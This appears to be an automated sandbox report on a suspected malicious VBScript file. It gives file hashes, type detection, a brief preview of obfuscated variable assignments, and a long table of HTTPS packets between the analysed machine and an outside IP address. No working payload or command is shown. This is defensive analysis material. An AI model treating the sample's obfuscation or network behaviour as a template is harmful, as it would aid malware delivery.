                        Static File Info

                        General

                        File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Entropy (8bit):3.759785683047965
                        TrID:
                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                        • MP3 audio (1001/1) 32.22%
                        • Lumena CEL bitmap (63/63) 2.03%
                        • Corel Photo Paint (41/41) 1.32%
                        File name:uLfuBVyZFV.vbs
                        File size:272'340 bytes
                        MD5:123316fb7db9c910bd92a9ad7e7bbdbc
                        SHA1:43dbabc790f0a0e20b397ad707bb33cb77004998
                        SHA256:79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a
                        SHA512:464013dec9186c1ee3698641077de5fc5f7c8bb36c4e1f72d80b6a7c947fa8e288cfd64ee22741a67ec91110681cfdd7c05d54727f815b831987caeff80f473f
                        SSDEEP:6144:cpuEfzXda5dDd2lsmruqXQKX/BPU9vJDAH11B9BiZi:c8EfzXdcdDIruqXQKX/BM9vJDAH1r9Bf
                        TLSH:2344060225EA7008F1F32F5796F955F94F6BB9662A39811D648C1B4E1BE3E80CD11BB3
                        File Content Preview:..P.n.K.p.z.P.A.L.G.x.q.o.k.G.m.m.x.m.L.f.c.G.z.L.k.a.J.p. .=. .".i.K.G.L.c.z.d.L.q.c.W.W.u.x.C.K.t.i.O.z.K.q.J.l.K.G.K.G.".....L.P.W.i.d.W.n.B.L.A.b.T.W.P.O.i.e.e.t.n.p.W.I.W.i.B.f.K. .=. .".k.i.p.k.L.L.U.N.c.L.n.f.B.K.W.S.K.L.G.u.s.c.m.b.b.e.u.m.".....k

                        File Icon

                        Icon Hash:68d69b8f86ab9a86

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 2, 2024 05:28:21.762658119 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:21.762774944 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:21.762981892 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:21.772136927 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:21.772192955 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.248826027 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.248985052 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.254215002 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.254244089 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.254580975 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.266217947 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.307446003 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370556116 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370630026 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370676041 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370706081 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370722055 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.370734930 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370781898 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.370812893 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.371170044 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.371361017 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.371666908 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.371715069 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.371754885 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.371784925 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.371808052 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.371850967 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.384943962 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.385112047 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.385140896 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.444643974 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.460144997 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460206032 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460252047 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460273027 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.460279942 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460309029 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460467100 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.460485935 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460549116 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460586071 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.460601091 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.460673094 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.460686922 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.461277008 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.461308002 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.461343050 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.461359978 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.461379051 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.461400986 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.461425066 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.462260008 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.462306976 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.462335110 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.462347031 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.462363958 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.462409973 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.462430954 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.462555885 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.462569952 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.463160038 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.463211060 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.463247061 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.463263035 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.463351011 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.507117987 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.518702030 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.548691034 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.548747063 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.548768044 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.548785925 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.548821926 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.548826933 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.548835039 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.548871994 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.548878908 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.549248934 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.549283981 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.549293995 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.549302101 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.549339056 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.549346924 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.550766945 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.550779104 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.550811052 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.550832033 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.550842047 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.550877094 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.550903082 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.552418947 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.552433968 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.552485943 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.552495003 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.552521944 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.552551985 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.607526064 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.607552052 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.607613087 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.607625961 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.607670069 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.637840986 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.637861013 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.637929916 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.637942076 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.637995958 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.639671087 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.639691114 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.639763117 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.639770985 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.639842987 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.640635967 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.640655994 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.640737057 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.640746117 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.640791893 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.642384052 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.642404079 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.642472982 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.642481089 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.642530918 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.643609047 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.643627882 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.643698931 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.643707991 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.643754959 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.645622015 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.645646095 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.645718098 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.645725965 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.645771027 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.696805000 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.696834087 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.696890116 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.696906090 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.696953058 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.696969986 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727278948 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727300882 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727365017 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727375984 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727426052 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727427959 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727442026 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727463007 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727497101 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727504015 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727519035 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727520943 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727539062 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727552891 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727560997 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727572918 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727638006 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.727946043 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.727962017 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.728015900 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.728024006 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.728070974 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.728346109 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.728360891 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.728416920 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.728425980 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.728467941 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.732800007 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.732816935 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.732886076 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.732894897 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.732949018 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.733259916 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.733277082 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.733318090 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.733326912 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.733359098 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.733370066 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.785510063 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.785528898 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.785609961 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.785620928 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.785664082 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.815359116 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.815376043 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.815444946 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.815454006 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.815500021 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.815772057 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.815788031 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.815834045 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.815840006 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.815869093 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.815890074 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.816175938 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.816195965 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.816251993 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.816258907 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.816302061 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.816324949 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.816606998 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.816625118 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.816679001 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.816687107 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.816785097 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.817034960 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817051888 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817099094 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.817106962 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817138910 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.817163944 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.817430973 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817446947 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817521095 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.817528963 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817569971 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.817924023 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.817950010 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.818011045 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.818018913 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.818058968 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.874314070 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.874346018 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.874505043 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.874516964 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.874562979 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.904316902 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.904342890 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.904441118 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.904457092 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.904510975 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.904683113 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.904701948 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.904753923 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.904762030 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.904830933 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.905179977 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905200958 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905256987 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.905265093 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905303001 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.905479908 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905497074 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905550957 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.905559063 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905596972 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.905980110 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.905997038 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906045914 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.906054974 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906097889 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.906466007 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906486988 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906536102 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.906544924 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906589985 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.906869888 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906888962 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906941891 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.906949997 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.906987906 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.963255882 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.963277102 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.963406086 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.963417053 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.963460922 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.993235111 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.993257999 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.993311882 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.993328094 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.993360996 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.993376970 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.993644953 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.993660927 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.993720055 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.993726969 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.993798018 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.994410992 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.994429111 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.994472027 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.994478941 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.994513988 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.994523048 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.996115923 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.996134043 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.996196985 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.996205091 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.996263027 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.996510983 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.996530056 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.996881008 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.996887922 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.996936083 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.997695923 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.997719049 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.997775078 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.997782946 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.997833014 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.998176098 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.998192072 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.998244047 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:22.998253107 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:22.998298883 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.052166939 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.052196026 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.052283049 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.052304983 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.052355051 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.082226038 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.082252979 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.082344055 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.082361937 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.082403898 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.082535028 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.082556009 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.082628012 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.082634926 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.082690954 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.083307028 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.083323956 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.083405972 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.083412886 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.083467007 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.084928989 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.084949970 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.085010052 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.085016966 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.085056067 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:23.085331917 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.085350990 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:23.085413933 CEST49704443192.168.2.7185.199.108.133
